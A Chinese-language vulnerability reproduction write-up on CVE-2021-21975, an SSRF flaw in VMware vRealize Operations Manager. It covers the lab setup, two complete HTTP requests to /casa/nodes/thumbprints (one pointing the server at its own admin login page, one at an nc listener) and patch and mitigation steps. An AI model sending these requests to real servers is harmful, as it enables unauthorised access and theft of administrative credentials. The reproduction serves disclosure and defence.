CVE-2021-21975:vRealize Operations Manager SSRF
原创CVE-2021-21975:vRealize Operations Manager SSRF
原创
影响范围
- VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0
- VMware Cloud Foundation 4.x、3.x
- vRealize Suite Lifecycle Manager 8.x
漏洞类型
服务端请求伪造
利用条件
影响范围内应用
漏洞概述
2021年3月31日,VMWare官方发布了VMSA-2021-0004的风险通告,漏洞编号为CVE-2021-21975,CVE-2021-21983,漏洞等级:高危,漏洞评分8.6。
CVE-2021-21975:通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击,以窃取管理凭据。
CVE-2021-21983:通过网络访问vRealize Operations Manager API的经过身份验证的恶意行为者可以将文件写入操作系统上的任意位置
漏洞复现
环境搭建
首先将OVA文件导入虚拟机中:
导入后需要重置一次密码(12345Qwert!@#$%)
之后再浏览器中访问以上URL:
之后设置密码(123Qwe!@#)
至此环境搭建完成~
漏洞利用
退出当前登录认证:
之后访问 /casa/nodes/thumbprints并使用burpsuite抓取数据包,构造以下请求数据包使服务端请求登录认证页面:
POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.203.155
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 36
["127.0.0.1:443/admin/login.action"]
使用DNSLog验证SSRF时发现好长一段时间都没有任何回显,后无奈使用nc进行验证,构造请求数据包如下:
POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.203.155
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 23
["192.168.202.86:4444"]
安全建议
1、官方已提供固件补丁包,可以访问以下连接下载
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
2、如果无法打补丁,可以根据以下步骤进行缓解
a、通过SSH或控制台以root用户身份登录到主节点,然后在控制台中按ALT + F1进行登录
b、在文本编辑器中打开/usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml,之后查找并删除以下内容:
<sec:http pattern ="/ nodes / thumbprints" security ='none'/>c、保存并关闭文件
d、重新启动CaSA服务:
e、重新启动vmware-casa服务
service vmware-casa restartf、在vRealize Operations群集中的所有其他节点上重复以上步骤
参考链接
https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml
欢迎关注微信公众号"七芒星实验室"获取更多精彩内容~
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。